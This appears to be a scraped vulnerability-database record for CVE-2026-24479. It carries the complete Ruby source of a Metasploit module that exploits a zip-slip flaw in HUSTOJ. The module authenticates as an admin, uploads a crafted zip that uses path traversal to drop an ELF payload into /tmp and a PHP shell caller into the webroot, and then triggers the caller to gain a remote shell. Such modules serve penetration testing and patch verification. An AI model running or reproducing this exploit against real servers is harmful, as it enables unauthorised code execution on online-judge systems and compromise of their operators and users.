{“lastseen”:”2026-05-15T16:31:56″,”description”:”This Metasploit module demonstrates a remote code execution vulnerability in HUSTOJ. A user with administrative privileges can abuse the problemimportqduoj.php CGI script using a crafted zip file zip-slip to traverse backwards through the filesystem,…”,”published”:”2026-05-15T00:00:00″,”modified”:”2026-05-15T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 HUSTOJ Zip Slip \/ Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:221161″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-24479″],”sourceData”:”##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n require ‘digest\/md5’\\n # Metasploit module for exploiting HUSTOJ problem import RCE (CVE-2026-24479)\\n class MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = GreatRanking\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::Retry\\n include Msf::Exploit::EXE\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘HUSTOJ Admin users can zip-slip problem_import_qduoj.php, planting PHP files in webroot for RCE’,\\n ‘Description’ =\\u003e \\u003c\\u003c~DESC,\\n A user with administrative privileges can abuse the problem_import_qduoj.php CGI script\\n using a crafted zip file (zip-slip) to traverse backwards through the filesystem, then to the\\n webroot, where they can extract a PHP file that spawns a shell to get full RCE in the\\n context of the webserver.\\n DESC\\n ‘Author’ =\\u003e [\\n ‘oxagast’, # exploit author\\n ‘LoTuS and friends’, # chinese to english translations\\n ‘ling101w’ # original discovery\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Arch’ =\\u003e [ARCH_X64],\\n ‘References’ =\\u003e [\\n [\\n ‘URL’, ‘https:\/\/github.com\/oxagast\/oxasploits\/blob\/JoshuaJohnWard\/exploits’ \\\\\\n ‘\/CVE-2026-24479\/hustoj_problem_import_rce.rb’\\n ],\\n [\\n ‘URL’, ‘https:\/\/github.com\/zhblue\/hustoj\/commit\/902bd09e6d0011fe89cd84d423’ \\\\\\n ‘6899314b33101f’\\n ],\\n [‘URL’, ‘https:\/\/github.com\/zhblue\/hustoj\/security\/advisories\/GHSA-xmgg-2rw4-7fxj’],\\n [‘CVE’, ‘2026-24479’],\\n [‘CWE’, ’22’]\\n ],\\n ‘Platform’ =\\u003e ‘linux’,\\n ‘Targets’ =\\u003e [[‘Auto’, {} ]],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\\n },\\n ‘DisclosureDate’ =\\u003e ‘2026-01-26’\\n )\\n )\\n register_options(\\n [\\n OptString.new(‘USERNAME’, [true, \\”The HUSTOJ administrative user’s username\\”, ‘admin’]),\\n OptString.new(‘PASSWORD’, [true, \\”The HUSTOJ administrative user’s password\\”, nil]),\\n OptString.new(‘DROPFILE’, [false, ‘The name of the file to drop on the target (without extension)’, ‘RANDOM’]),\\n OptString.new(‘SERVLOC’, [true, ‘The location HUSTOJ is being served from’, ‘\/home\/judge’]),\\n OptBool.new(‘FORCE’, [false, ‘Try to exploit even if it will probably fail’, false]),\\n OptInt.new(‘TRAVERSE_LIMIT’, [true, ‘Number of ..\/ traversals to include in zip slip paths’, 6]),\\n OptInt.new(‘TIME_LIMIT’, [true, ‘Time limit for the exploit to succeed in seconds’, 60])\\n ]\\n )\\n end\\n \\n # Authenticate as admin and return session cookies\\n def login(user, pass)\\n check = send_request_cgi(\\n ‘uri’ =\\u003e ‘\/include\/reinfo.js’,\\n ‘method’ =\\u003e ‘GET’,\\n ‘ctype’ =\\u003e ‘application\/javascript’\\n )\\n if check.nil?\\n fail_with(Failure::Unreachable, ‘Failed to connect to the target webserver!’)\\n else\\n print_good(\\”Connected to the target webserver! #{Rex::Socket.to_authority(datastore[‘RHOST’], datastore[‘RPORT’])}\\”)\\n end\\n # try to figure out what we are running against\\n unless check \\u0026\\u0026 check.code == 200\\n if check \\u0026\\u0026 check.code == 404\\n print_error(‘Target returned 404 for \/include\/reinfo.js, this is not HUSTOJ!’)\\n else\\n print_error(‘Target responded, but check did not pass!’)\\n end\\n unless datastore[‘FORCE’]\\n fail_with(Failure::NotFound, ‘Could not find reinfo.js. Target is not running HUSTOJ! Try FORCE.’)\\n end\\n end\\n unless check \\u0026\\u0026 check.code == 200 \\u0026\\u0026 check.body \\u0026\\u0026 check.body.include?(‘function escapeHtml(str) {‘) == false\\n print_error(‘Target appears to be running HUSTOJ, but my be a patched version!’)\\n unless datastore[‘FORCE’]\\n print_error(‘Body check does not contain escapehtml function…’)\\n fail_with(Failure::NotVulnerable, ‘Target is running a patched version of HUSTOJ! Try FORCE.’)\\n end\\n end\\n if check \\u0026\\u0026 check.code == 200 \\u0026\\u0026 check.body \\u0026\\u0026 check.body.include?(‘var ret=pat.exec(errmsg);’) \\u0026\\u0026 check.body.include?(‘function escapeHtml(str) {‘) == false\\n print_good(‘Good! Target appears to be running a vulnerable version of HUSTOJ!’)\\n else\\n print_error(‘Target does not appear to be running a vulnerable version of HUSTOJ!’)\\n unless datastore[‘FORCE’]\\n print_error(‘Body check does not contain pat.exec function’)\\n fail_with(Failure::NotFound, ‘Target is not HUSTOJ or is a patched version! Try FORCE.’)\\n end\\n end\\n send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e ‘\/login.php’,\\n ‘keep_cookies’ =\\u003e true,\\n ‘ctype’ =\\u003e ‘application\/x-www-form-urlencoded’,\\n ‘vars_post’ =\\u003e {\\n ‘user_id’ =\\u003e user,\\n ‘password’ =\\u003e Digest::MD5.hexdigest(pass)\\n }\\n )\\n \\n # Check if login was successful\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e ‘\/modifypage.php’,\\n ‘keep_cookies’ =\\u003e true\\n )\\n # we check for userinfo.php because it doesn’t exist if our login fails\\n unless res \\u0026\\u0026 res.code == 200 \\u0026\\u0026 res.body \\u0026\\u0026 res.body.include?(‘userinfo.php’)\\n fail_with(Failure::NoAccess, ‘Failed to authenticate! Check credentials.’)\\n end\\n stars = ‘*’ * pass.length\\n print_good(\\”Logged in successfully! #{user}:#{stars}\\”)\\n # Check if the account has admin privileges\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e ‘\/admin\/menu2.php’,\\n ‘keep_cookies’ =\\u003e true\\n )\\n unless res \\u0026\\u0026 res.code == 200 \\u0026\\u0026 res.body \\u0026\\u0026 res.body.include?(‘problem_import.php’)\\n fail_with(Failure::NoAccess, ‘Authenticated but does not appear to have admin privileges!’)\\n end\\n return true\\n end\\n \\n # Upload the malicious zip payload using the admin session\\n def upload_payload(zip_dat, _rand_tag, dds)\\n zip_size_kb = (zip_dat.length \/ 1024.0).round(2)\\n print_status(\\”Uploading the payload… #{zip_size_kb}kb\\”)\\n form_data = Rex::MIME::Message.new\\n # it is ncessary for the MIME type to be application\/octet-stream instead of application\/zip\\n # for this to work when using Rex::MIME::Message, otherwise no POST req is ever made. Not\\n # entirely sure what causes this.\\n form_data.add_part(zip_dat, ‘application\/octet-stream’, nil, \\”form-data; name=\\\\\\”fps\\\\\\”; filename=\\\\\\”#{datastore[‘DROPFILE’]}.zip\\\\\\”\\”)\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e ‘\/admin\/problem_import_qduoj.php’,\\n ‘keep_cookies’ =\\u003e true,\\n ‘ctype’ =\\u003e \\”multipart\/form-data; boundary=#{form_data.bound}\\”,\\n ‘data’ =\\u003e form_data.to_s\\n )\\n if res \\u0026\\u0026 res.code == 200\\n print_good(\\”Payload uploaded! #{datastore[‘DROPFILE’]}.zip\\”)\\n print_status(\\”This is where the zipslip happens… #{dds} (levels: #{datastore[‘TRAVERSE_LIMIT’]})\\”)\\n else\\n fail_with(Failure::UnexpectedReply, ‘Failed to upload the payload! Check your session and try again.’)\\n end\\n end\\n \\n # Trigger the uploaded PHP shell to execute the payload\\n def trigger_sploit(rand_tag)\\n print_status(\\”Triggering the php script… #{datastore[‘DROPFILE’]}-#{rand_tag}.php\\”)\\n trig = send_request_raw(\\n {\\n ‘uri’ =\\u003e \\”\/#{datastore[‘DROPFILE’]}-#{rand_tag}.php\\”,\\n ‘method’ =\\u003e ‘GET’\\n }\\n )\\n if trig \\u0026\\u0026 trig.code == 200\\n sleep(2) # give it a moment to pop the session before we ret\\n return true\\n end\\n end\\n \\n # Clean up dropped files after exploitation\\n def cleanup\\n super\\n # prevents the cleanup routine from running multiple times (reduses log noise)\\n send_request_raw(\\n {\\n ‘uri’ =\\u003e \\”\/#{datastore[‘DROPFILE’]}-cu.php\\”,\\n ‘method’ =\\u003e ‘GET’\\n }\\n )\\n print_status(‘Cleaning up the payload caller and shell files…’)\\n end\\n \\n # Main exploit logic\\n def exploit\\n # Authenticate, upload, and trigger the exploit!\\n if datastore[‘DROPFILE’] == ‘RANDOM’\\n datastore[‘DROPFILE’] = Rex::Text.rand_text_alpha(3)\\n end\\n opts = {\\n format: ‘elf’\\n }\\n shell_gend = generate_payload_exe(opts)\\n unless datastore[‘DROPFILE’].match?(\/\\\\A\\\\w+\\\\z\/)\\n fail_with(Failure::BadConfig, ‘DROPFILE should be alphanumeric.’)\\n end\\n if shell_gend.empty?\\n fail_with(Failure::PayloadFailed, ‘Payload generation failed! Try a different payload?’)\\n end\\n print_good(\\”Payload generated! #{datastore[‘PAYLOAD’]}\\”)\\n # Generate a random tag for file uniqueness\\n rand_tag = Rex::Text.rand_text_alpha(5)\\n print_status(\\”Random payload tag #{rand_tag}\\”)\\n # PHP script to call the ELF payload\\n shell_caller = \\”\\u003c?php http_response_code(200); fastcgi_finish_request(); chmod(‘\/tmp\/#{datastore[‘DROPFILE’]}-#{rand_tag}’, 0700); system(‘\/tmp\/#{datastore[‘DROPFILE’]}-#{rand_tag}’); ?\\u003e\\”\\n # PHP script to clean up dropped files\\n cleanup_caller = \\”\\u003c?php unlink(‘\/tmp\/#{datastore[‘DROPFILE’]}-#{rand_tag}’); unlink(‘#{datastore[‘SERVLOC’]}\/src\/web\/#{datastore[‘DROPFILE’]}\\” \\\\\\n \\”-#{rand_tag}.php’); unlink(‘#{datastore[‘SERVLOC’]}\/src\/web\/#{datastore[‘DROPFILE’]}-cu.php’); ?\\u003e\\”\\n dds = ‘..\/’ * datastore[‘TRAVERSE_LIMIT’] # Directory traversal string for zipslip\\n # Files to include in the malicious zip (zipslip paths for traversal)\\n # problem_1010 in\/out files can be empty, but should be in the zip to ensure serverside import\\n files = [\\n { data: shell_gend, fname: \\”#{dds}tmp\/#{datastore[‘DROPFILE’]}-#{rand_tag}\\” },\\n { data: shell_caller, fname: \\”#{dds}#{datastore[‘SERVLOC’]}\/src\/web\/#{datastore[‘DROPFILE’]}-#{rand_tag}.php\\” },\\n { data: cleanup_caller, fname: \\”#{dds}#{datastore[‘SERVLOC’]}\/src\/web\/#{datastore[‘DROPFILE’]}-cu.php\\” },\\n { data: ‘{}’, fname: ‘problem_1010.json’ },\\n { data: ”, fname: ‘problem_1010\/1.in’ },\\n { data: ”, fname: ‘problem_1010\/1.out’ }\\n ]\\n # Create the malicious zip archive\\n zip_dat = Msf::Util::EXE.to_zip(files)\\n fail_with(Failure::PayloadFailed, ‘Zip generation failed!’) if zip_dat.empty?\\n print_good(\\”Zip file generated! Files: #{files.length}\\”)\\n unless datastore[‘TRAVERSE_LIMIT’] \\u003e= 2\\n fail_with(Failure::BadConfig, ‘TRAVERSE_LIMIT should be at least 2 to ensure the zip slip can reach the root of the fs!’)\\n end\\n unless datastore[‘USERNAME’] \\u0026\\u0026 datastore[‘PASSWORD’]\\n fail_with(Failure::BadConfig, ‘USERNAME and PASSWORD must be set to an admin account!’)\\n end\\n unless login(datastore[‘USERNAME’], datastore[‘PASSWORD’]) \\u0026\\u0026 upload_payload(zip_dat, rand_tag, dds)\\n fail_with(Failure::Unknown, ‘Something strange happened in the login or upload!’)\\n end\\n popped = retry_until_truthy(timeout: datastore[‘TIME_LIMIT’]) do\\n trigger_sploit(rand_tag)\\n end\\n unless popped\\n fail_with(Failure::PayloadFailed, ‘Failed to trigger the payload within timeout! Check your listener?’)\\n end\\n end\\n end”,”sourceHref”:”https:\/\/packetstorm.news\/download\/221161″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/221161\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-15T16:31:56″,”description”:”This Metasploit module demonstrates a remote code execution vulnerability in HUSTOJ. A user with administrative privileges can abuse the problemimportqduoj.php CGI script using a crafted…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-54874","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n